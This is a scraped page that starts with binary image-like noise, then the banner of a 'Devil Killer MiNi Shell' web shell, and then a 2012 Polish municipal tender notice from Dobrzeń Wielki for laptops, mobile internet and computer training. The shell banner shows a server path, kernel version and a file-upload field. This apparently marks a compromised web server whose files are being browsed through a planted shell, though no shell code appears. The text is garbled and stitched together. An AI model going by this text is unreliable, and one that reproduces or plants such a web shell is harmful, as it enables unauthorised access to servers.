JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120914/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120914/198807-N-2012.html

<p class="kh_header"><b>Dobrzeń Wielki: Dostawa  i zainstalowanie 35 szt. laptopów, usługa  łączności mobilnego internetu oraz zorganizowanie i przeprowadzenie profesjonalnego szkolenia z podstaw obsługi komputera na potrzeby Projektu współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka 2007 - 2013 Dotacje na Innowacje   Inwestujemy w Waszą przyszłość Internet dla dzieci - przeciwdziałanie wykluczeniu cyfrowemu w Gminie Dobrzeń Wielki POIG.08.0300-16-133/11</b><br>
<b>Numer ogłoszenia: 198807 - 2012; data zamieszczenia: 14.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dobrzeń Wielki , ul. Namysłowska 44, 46-081 Dobrzeń Wielki, woj. opolskie, tel. 77 4695525, faks 77 4695524.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dobrzenwielki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  i zainstalowanie 35 szt. laptopów, usługa  łączności mobilnego internetu oraz zorganizowanie i przeprowadzenie profesjonalnego szkolenia z podstaw obsługi komputera na potrzeby Projektu współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka 2007 - 2013 Dotacje na Innowacje   Inwestujemy w Waszą przyszłość Internet dla dzieci - przeciwdziałanie wykluczeniu cyfrowemu w Gminie Dobrzeń Wielki POIG.08.0300-16-133/11.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres rzeczowy obejmuje wykonanie:
a) dostawa i zainstalowanie pod wskazanymi adresami i u wskazanych imiennie osób zamieszkałych na terenie gminy Dobrzeń Wielki zwanych dalej Beneficjentami Ostatecznymi 35 szt. laptopów, wyposażonych w system operacyjny, pakiet biurowy, oprogramowanie antywirusowe 
Szczegółową specyfikację zestawu komputerowego zawiera załącznik la do umowy.
Sprzęt komputerowy powinien być zabezpieczony plombami.
Sprzęt musi być fabrycznie nowy i nieobciążony prawami osób trzecich.
Sprzęt powinien pochodzić z polskiej dystrybucji.
Zamawiający nie dopuszcza możliwości złożenia oferty obejmującej sprzęt komputerowy różnych producentów, marek i typów.
Wykonawca dostarczy dokumenty potwierdzające legalność instalowanych programów oraz po jednym nośniku zaoferowanego oprogramowania zgodnie z wymaganiami producenta oprogramowania. W przypadku licencji zbiorczej Wykonawca dostarczy do Zamawiającego oryginał oraz potwierdzone za zgodność z oryginałem kopie licencji w ilości odpowiadającej ilości dostarczonego oprogramowania.
Wykonawca zobowiązany jest wypełnić Kartę sprzętu informatycznego i oprogramowania zgodnie z załączonym wzorem załącznik lb do umowy
Wykonawca w ramach dostawy zobowiązany jest dokonać pierwszego uruchomienia dostarczonego zestawu i na miejscu udzielić użytkownikom podstawowego instruktażu użytkowania.
Jeżeli w opisie przedmiotu zamówienia znajdują się jakiekolwiek: znak towarowy, patent czy pochodzenie (nazwa producenta) - należy przyjąć, że Zamawiający podał taki opis ze wskazaniem na typ i dopuszcza składanie ofert równoważnych o parametrach techniczno-eksploatacyjno- użytkowych nie gorszych niż te, podane pod pojęciem typu (podstawa prawna: art. 29 ust. 3 Ustawy Pzp).
W przypadku złożenia oferty, w której zostanie zaoferowany przedmiot zamówienia o parametrach równoważnych - Wykonawca zobowiązany jest złożyć oświadczenie, że oferta jest równoważna z opisem przedmiotu zamówienia. Wykonawca powinien wskazać (podać) dokumenty potwierdzające równoważność rozwiązań. Zamawiający korzystając ewentualnie z opinii rzeczoznawców dokona oceny zaproponowanych rozwiązań oraz zdecyduje o ich równoważności. W przypadku wątpliwości, obowiązek udowodnienia równoważności złożonej oferty spoczywa na Wykonawcy.
Wykonawca, wraz z dostarczonym sprzętem, zobowiązany jest do dołączenia do przedmiotu zamówienia wymaganych certyfikatów polskich i unijnych.
Zaleca się, aby Wykonawca przed przygotowaniem oferty, zapoznał się z miejscem dostawy tj.: poprzez dokonanie wizji lokalnej oraz zadanie wszelkich pytań związanych z realizacja zamówienia.

Usługa łączności mobilnego internetu wraz z zakupem i dostawą modemów z kartami SIM w ilości 35 szt. 
Wykonawca uruchomi łącze internetowe pod wskazanymi adresami 35 Beneficjentów Ostatecznych zamieszkałych na terenie Gminy Dobrzeń Wielki - załącznik nr 1c do umowy zawiera wykaz adresów. Dostęp musi być realizowany co najmniej w technologii HSPA lub LTE oraz dostarczy konieczne karty SIM.

Dostarczona usługa musi zapewniać świadczenie kompleksowych usługi mobilnego dostępu do Internetu na co najmniej 95% powierzchni  terenu Polski, w miastach powyżej 100.000 mieszkańców, 

	1. Usługa mobilnego dostępu do Internetu - wymogi minimalne:
1.1	Limit na transfer danych:
- 	 usługa musi posiadać limit minimum 10GB/miesiąc.
Zamawiający dopuszcza możliwość świadczenia usługi mobilnego dostępu do Internetu bez określania limitów na transfer danych.
1.2	Adresacja IP:
- 	usługi mogą mieć dowolne adresy IP nadawane przez Wykonawcę dynamicznie
1.3.	Usługa musi być realizowana w technologii zapewniającej maksymalną możliwą w danych warunkach prędkość transferu danych.
Zapewnia świadczenie kompleksowych usługi mobilnego dostępu do Internetu na co najmniej 95% powierzchni  terenu Polski, w miastach powyżej 100.000 mieszkańców, dostęp musi być realizowany co najmniej w technologii HSPA lub LTE oraz dostarczy konieczne karty SIM.

2. 	Opis techniczny modemów USB do obsługi mobilnego Internetu - 35 sztuk - wymogi minimalne:
2.1. Modemy są fabrycznie nowe.
2.2. 	Modemy posiadają świadectwo homologacji uprawniające do użytkowania urządzeń co najmniej na terytorium Polski.
2.3.	Modemy obsługują wszelkie dostępne w sieci Wykonawcy technologie transmisji danych, zapewniają prędkość pobierania danych minimum 20 Mb/s oraz prędkość wysyłania danych minimum 5 Mb/s.
2.4. 	Modemy wyposażone są w sterowniki i oprogramowanie umożliwiające ich pracę pod kontrolą minimum Windows XP, Windows 7.
2.5.	Modem dostarczony jest w oryginalnym, zamkniętym opakowaniu producenta uniemożliwiającym uszkodzenie urządzenia.
2.7.	Wykonawca wraz z modemami USB dostarcza instrukcję w języku polskim, oryginalną gwarancję producenta.

3.	Abonament - 35 usług.
3.1	Usługi mobilnego dostępu do Internetu realizowane przez Wykonawcę (z wyjątkiem dostawy modemów) -świadczone są w formie abonamentu miesięcznego. Abonament jest to zadeklarowana stała miesięczna opłata na rzecz Wykonawcy, do wykorzystania przez Zamawiającego za wszelkie usługi telekomunikacyjne w danym cyklu rozliczeniowym.
3.2	W ramach abonamentu Zamawiający wymaga:
-	świadczenia usługi mobilnego dostępu do Internetu;
-	monitorowania miesięcznego limitu transferu danych;
-	zapewnienia właściwej adresacji IP. 

4.	Serwis i warunki gwarancji modemów.
	Wykonawca:
4.1	Zapewnia, aby dostarczone modemy były objęte co najmniej 2 letnią gwarancją producenta na zasadach określonych w karcie gwarancji oraz ponosi odpowiedzialność z tytułu rękojmi za wady rzeczy sprzedanej.
4.2	Przyjmuje wszelkie przypadki nieprawidłowego działania modemów, które zgłasza Zamawiający telefonicznie lub za pośrednictwem poczty elektronicznej na numer telefonu lub adres wskazany przez Wykonawcę - czas reakcji po zgłoszeniu informacji o uszkodzeniu modemu (odebranie do naprawy z siedziby Zamawiającego) wynosi maksymalnie 2 dni robocze.
4.3	Gwarantuje w ramach umowy pełną obsługę serwisową modemów m.in. odbiór uszkodzonego modemu z siedziby Zamawiającego, zapewnia modem zastępczy w miejsce urządzenia uszkodzonego na cały okres naprawy oraz dostarcza modem po naprawie bezpośrednio do siedziby Zamawiającego przy ul. Namysłowskiej 44 w Dobrzeniu Wielkim. Odbiór uszkodzonego i zwrot naprawionego modemu do siedziby Zamawiającego odbywa się na koszt Wykonawcy.
4.4	W przypadku napraw płatnych Wykonawcy przedstawia Zamawiającemu kosztorys naprawy wraz z uzasadnieniem przyczyn, iż dany modem nie może być naprawiony w ramach gwarancji lub rękojmi przed jej wykonaniem, który akceptuje lub nie akceptuje Zamawiający.
4.5	W przypadku braku możliwości dokonania naprawy uszkodzonego modemu objętego gwarancją, Wykonawca dostarcza Zamawiającemu na własny koszt, inny egzemplarz modemu o identycznych lub lepszych parametrach.
4.6	Wykonuje usługę naprawy zgodnie z gwarancją producenta, w terminie objętym gwarancją.

SZKOLENIA:
Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie profesjonalnego szkolenia z podstaw obsługi komputera - dla grupy 70 osób składających się z 70 osób  uczestniczących w projekcie Internet dla dzieci - przeciwdziałanie wykluczeniu cyfrowemu w Gminie Dobrzeń Wielki osi priorytetowej 8.Społeczeństwo informacyjne - zwiększenie innowacyjności gospodarki  Programu Operacyjnego Innowacyjna Gospodarka 2007 - 2013 
Przedmiot zamówienia obejmuje zorganizowanie i przeprowadzenie szkolenia, zgodnie z zaproponowanym przez Wykonawcę harmonogramem (Załącznik nr 1 d  do umowy), w zakresie: OBSŁUGI KOMPUTERA. Program szkolenia powinien obejmować co najmniej następujące zagadnienia:
1)	Bezpieczeństwo pracy z komputerem, jego obsługa oraz podstawy budowy komputera
2)	Edytory tekstu, arkusze kalkulacyjne, programy  do prezentacji
3)	Korzystanie z Internetu: strony www, poczta e-mail
Minimalne wymagania dotyczące szkoleń: 
a)	Miejsce Szkolenia: Sala konferencyjna Urzędu Gminy Dobrzeń Wielki. Do zadań Wykonawcy należeć będzie uzgodnienie z Zamawiającym terminu szkolenia. 
b)	Czas trwania szkolenia: maksymalnie 4 tygodnie,
c)	Wykonawca powinien przeprowadzić szkolenie w grupach około 10 osobowych, w sumie szkolenie powinno trwać 70 godzin
d)	Firma szkoleniowa zapewni sprzęt komputerowy z zainstalowanym oprogramowaniem,  na którym będą odbywały się szkolenia. . Na Sali musi znajdować się aktywne, połączenie z Internetem. Przy jednym stanowisku komputerowym - jeden uczestnik szkolenia.
e)	Opracowanie harmonogramu kursu. Szkolenia będą rozpoczynać  się nie wcześniej niż o godzinie 8.00 i kończyć się nie później niż o godzinie 20.00.
f)	Podstawą rozliczenia jest ilość faktycznie zrealizowanych godzin, 
g)	Ostateczny termin realizacji przedmiotu zamówienia - do dnia 30 listopada 2012r.
h)	Zapewnienie trenerów do przeprowadzenia szkolenia (koszt dojazdu, zakwaterowania i wyżywienia trenerów ponosi Wykonawca)
i)	Podczas trwania szkolenia wykładowcy mają obowiązek prowadzić dziennik zajęć, wypełniany w każdym dniu prowadzenia zajęć zgodnie z programem szkolenia przedstawionym w ofercie przetargowej.
j)	Wykonawca zapewni rzutnik lub inny sprzęt umożliwiający pokaz prezentacji w celu lepszego przedstawienia materiału dydaktycznego uczestnikom szkolenia. 
k)	Zapewnienie właściwego oznakowania miejsca szkolenia - zgodne z wymogami promocji Projektu (materiały zapewnia Zamawiający; odbiór w siedzibie Zamawiającego).
l)	Wydanie każdemu uczestnikowi szkolenia, Certyfikatu ukończenia szkolenia współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka 2007-2013, który będzie zawierał między innymi informację o ilości godzin i zrealizowanym zakresie tematycznym oraz oznaczenia dotyczące współfinansowania Projektu. 
m)	Prowadzenie dokumentacji  z przebiegu szkolenia tj. dzienników zajęć edukacyjnych zawierającego listę obecności, wymiar godzin i tematy zajęć edukacyjnych, rejestr wydanych zaświadczeń 
n)	Umożliwienie Zamawiającemu oraz innym uprawnionym podmiotom przeprowadzenia kontroli prawidłowości realizacji usługi, w tym m.in. prowadzonej dokumentacji, instruktorów i osób szkolonych w dowolnym momencie realizacji usługi, zarówno w siedzibie Wykonawcy, jak i w miejscu realizacji usługi.
o)	Przeprowadzenie na zakończenie kursu ankiety ewaluacyjnej określającej poziom zadowolenia uczestników z odbytego kursu, przydatność omawianych zagadnień.
p)	Zgłaszanie Zamawiającemu w formie pisemnej lub e-mailem w terminie 1 dnia od zaistnienia zdarzenia:
wszelkich nieobecności uczestników na szkoleniu, 
przypadków rezygnacji z uczestnictwa w szkoleniu w trakcie jego trwania,
wszelkich innych zmian dotyczących szkolenia np.: nie rozpoczęcia szkolenia, przerw w szkoleniu.
q)	Przygotowania pisemnego Raportu z realizacji usługi szkoleniowej, nie później niż w terminie 14 dni po zakończeniu szkolenia, zawierającego podsumowanie całego szkolenia, do którego będą dołączone w szczególności:
ankiety oceniające szkolenie wypełnione przez uczestników,
dziennik zajęć edukacyjnych zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych, rejestr wydanych zaświadczeń o ukończeniu szkolenia i odbioru materiałów szkoleniowych,
kserokopie potwierdzone za zgodność z oryginałem wszystkich wydanych zaświadczeń o ukończeniu szkolenia, 
r)	Wykonawca skonsultuje się z Zamawiającym w celu ustalenia wzoru zaświadczenia i przedstawi go Zamawiającemu do akceptacji nie później niż na 5 dni przed terminem szkolenia.
s)	Wyjaśnienia lub uzupełnienia Raportu, o którym mowa w pkt 12, w terminie 5 dni od daty otrzymania uwag od Zamawiającego.
t)	Podpisania umowy w sprawie powierzenia przetwarzania danych osobowych - wzór stanowi Załącznik nr 3

Minimalne wymagania dotyczące sali szkoleniowej
Obowiązkiem Wykonawcy jest:
1.	Zapewnienie sprzętu komputerowego wraz z niezbędnym oprogramowaniem.
Zapewnienia sprzętu komputerowego wraz z oprogramowaniem w ilości i jakości umożliwiającej sprawne przeprowadzenie kursu - 10-15 stanowisk;
Każdy z uczestników musi mieć zapewnione własne stanowisko komputerowe składające się z jednostki centralnej, monitora, myszy oraz klawiatury lub równoważną konfigurację.
Komputery muszą być wyposażone w legalne, licencjonowane oprogramowanie w polskiej wersji językowej.
Komputery z zainstalowanym systemem operacyjnym Microsoft Windows w wersji 7 oraz oprogramowaniem biurowym zawierającym co najmniej:
Edytor tekstu, 
Arkusz kalkulacyjny,
Przeglądarkę internetową,
Program do obsługi poczty internetowej,
 Zapewnienie podczas trwania kursu stałego połączenia komputerów z Internetem..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5, 48.62.40.00-8, 80.53.31.00-0, 64.21.60.00-3, 64.21.26.00-1, 64.21.27.00-2, 32.55.24.10-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości: 
3 000.00 PLN (słownie:  trzy  tysiące  złotych 00/100 PLN)
Wadium należy wnieść  w terminie do dnia 2012-09-26 do godz. 10:00</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli Wykonawca:
a)wykaże udokumentowanie  wykonaniatj.zakończenia a nie rozpoczęcia i zakończenia w ciągu ostatnich  trzech lat przed upływem terminu składania ofert, a jeżeli okres  prowadzenia działalności jest krótszy- w tym  okresie , dostaw minimum 30 zestawów  komputerowych 
b)Wykaże udokumentowane wykonanie , w okresie ostatnich trzech lat przed upływem  terminu składania  ofert, a jeżeli okres prowadzenia działalności jest  krótszy - w tym okresie, minimum10 kursów lub szkoleń, dla minimum 50 osób łącznie z obsługi komputera oraz korzystania z przeglądarki internetowej.
Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana wg formuły spełnia- nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony , jeżeli Wykonawca dysponuje minimum 1 trenerem ( ekspertem), który będzie uczetniczyć w wykonaniu zamówienia,  który przeprowadził minimum 10 kursów lub szkoleń dla grupy osób  dorosłych w zakresie podstawowej obsługi komputera i przeglądarki internetowej.
Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana wg formuły spełnia- nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
